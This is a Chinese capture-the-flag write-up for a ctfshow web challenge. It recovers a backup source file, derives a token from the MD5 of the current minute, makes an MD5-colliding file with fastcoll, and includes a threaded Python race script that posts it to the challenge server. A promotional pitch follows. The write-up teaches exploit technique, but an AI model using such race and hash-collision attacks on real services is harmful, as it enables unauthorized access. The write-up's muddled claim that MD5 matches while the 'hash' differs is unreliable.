CTF show Web 红包题第六弹

提示

1.不是SQL注入 2.需要找关键源码

思路

进入页面发现是一个登录框,很难让人不联想到SQL注入,但提示都说了不是SQL注入,所以就不往这方面想了

先查看一下网页源码,发现一段JavaScript代码,有一个关键类ctfshow

其关键位置在oReq.open这里,显示的是以POST方法,请求check.php页面,并且传入值token=变量token然后接上php://input

直接访问check.php页面,可以看到一个Josn页面,我们直接按照页面源码中的提示来访问一下

提示md5 error

然后利用目录扫描工具,扫一下网站,看看有什么东西

发现扫到了一千多条东西,太多了一个一个看得看到啥时候

直接导出,然后在notepad++中查看,查找一下需要的后缀名

发现挺多zip文件的,但有很多一看就不是关键信息的就没管,剩下的一个一个试,发现web.zip可以下载,其他的都是闪一下就没了,啥也没下

打开web.zip,发现里面有一个check.php.bak的文件,这明显就是check.php页面的备份文件,打开这个文件看一下

对源码分析:

先进行if判断,也就是我们输入的token需要和md5(date("i")相同

  • md5不用说,date("i")就是获得当前的分钟

    • 扩展一下,date("m")就是获得当前的月
    • date("d")是获得当前的日
    • date("h")获得当前的小时
    • date("s")获得当前的秒

所以我们输入的token就是需要是当前的分钟进行md5加密

接着往下分析,看到了$receiveFile变量接收了一个字符串flag.dat,然后被传入了receiveStreamFile方法中

receiveStreamFile方法中会先进行判断,判断$GLOBALS['HTTP_RAW_POST_DATA']是否为空

优先从GLOBALS\['HTTP_RAW_POST_DATA'\]​ 获取原始数据,如果为空,那么就利用php://input​流获取POST数据,然后将数据写入receiveFile指定的文件,也就是flag.dat

然后返回值,进行if判断,我们写入的文件和服务器存放发文件key.dat的md5值需要一样,但哈希值不需要一样,总所周知,可以利用工具制造一个md5一样的文件,但哈希都是独一无二的,所以就可以很轻松过了这个检测

在源码中,我们也是知道了有一个ket.dat文件直接访问这个文件进行下载,然后我将下载的key放入了先前解压的web.zip文件夹中了

然后就是利用我刚才说的工具,生成一个md5相同的文件,直接点着key.dat拖向fastcoll_v1.0.0.5.exe就生成了两个key_msg文件,这两个文件的md5是一样的

Exp

然后编写脚本

python 复制代码
import requests
import datetime
import threading
import hashlib

t = datetime.datetime.now().minute			#获取当前分钟
token = hashlib.md5(str(t).encode()).hexdigest()			#将获取的分钟进行md5加密
re = ''			#设置全局变量,用于接收返回的页面源码
url = "http://728a1bb2-c338-43b9-9c52-5df4302818b3.challenge.ctf.show/"
def szRequest(url, flag):
    url = f"{url}check.php?token={token}&php://input"
    global re
    s = requests.post(url, data=flag)		#利用POST请求,请求数据就是传入的key和data
    re = s.text

with open('key.dat', 'rb') as f:				#读取下载的key
    key = f.read()
with open('key_msg1.dat', 'rb') as fi:			#读取利用工具生成的文件,生成的文件1或文件2都可以
    data = fi.read()
while True:
    threading.Thread(target=szRequest, args=(url, key)).start()			#python中的多线程模块
    threading.Thread(target=szRequest, args=(url, data)).start()		#threading.Thread()创建线程对象,target=szRequest,指定当前线程要执行的函数,args=(url, data)是执行函数传入的参数,.start()是开始执行
    if "ctfshow" in re:			
        print(re)			#如果返回的页面源码中有ctfshow字符串,就打印并退出
        break

运行结果:


最后多说一句

真正想进步的你,其实只缺一个东西:一份别人实践过、你能直接借鉴的内容体系。

我分享的这个学习圈,里面不仅有上千份SRC报告、漏洞复盘材料 ,还有2个T的各类 学习资料,漏洞靶场,网课资源和常见面试题资料包

有了方向,有了范例,才有可能走得更快。

欢迎各位师傅加入知识大陆的帮会,我们一起进步,共同学习

加入帮会-发现更有料的网安圈

相关推荐
m0_747266096 小时前
代码审计与web安全选择题1
网络安全
编程到天明11 小时前
CTF-Web题解:“require_once(‘flag.php‘); &assert(“$i == $u“);”
网络安全·php
Johny_Zhao11 小时前
CentOS Stream 9上部署FTP应用服务的两种方法(传统安装和docker-compose)
linux·网络安全·信息安全·kubernetes·云计算·containerd·ftp·yum源·系统运维
还是奇怪12 小时前
深入解析三大Web安全威胁:文件上传漏洞、SQL注入漏洞与WebShell
sql·安全·web安全
@大迁世界14 小时前
第7章 React性能优化核心
前端·javascript·react.js·性能优化·前端框架
我是哈哈hh15 小时前
【AJAX项目】黑马头条——数据管理平台
前端·javascript·ajax·前端框架·axios·proxy模式
我想说一句15 小时前
使用React开发拉布布旅游智能聊天机器人的实践
前端·前端框架
咔咔一顿操作16 小时前
常见问题三
前端·javascript·vue.js·前端框架
每天开心18 小时前
噜噜旅游App(4)——构建旅游智能客服模块,实现AI聊天
前端·微信小程序·前端框架
RaidenLiu18 小时前
Flutter Shader预热技术解析与实践指南
flutter·前端框架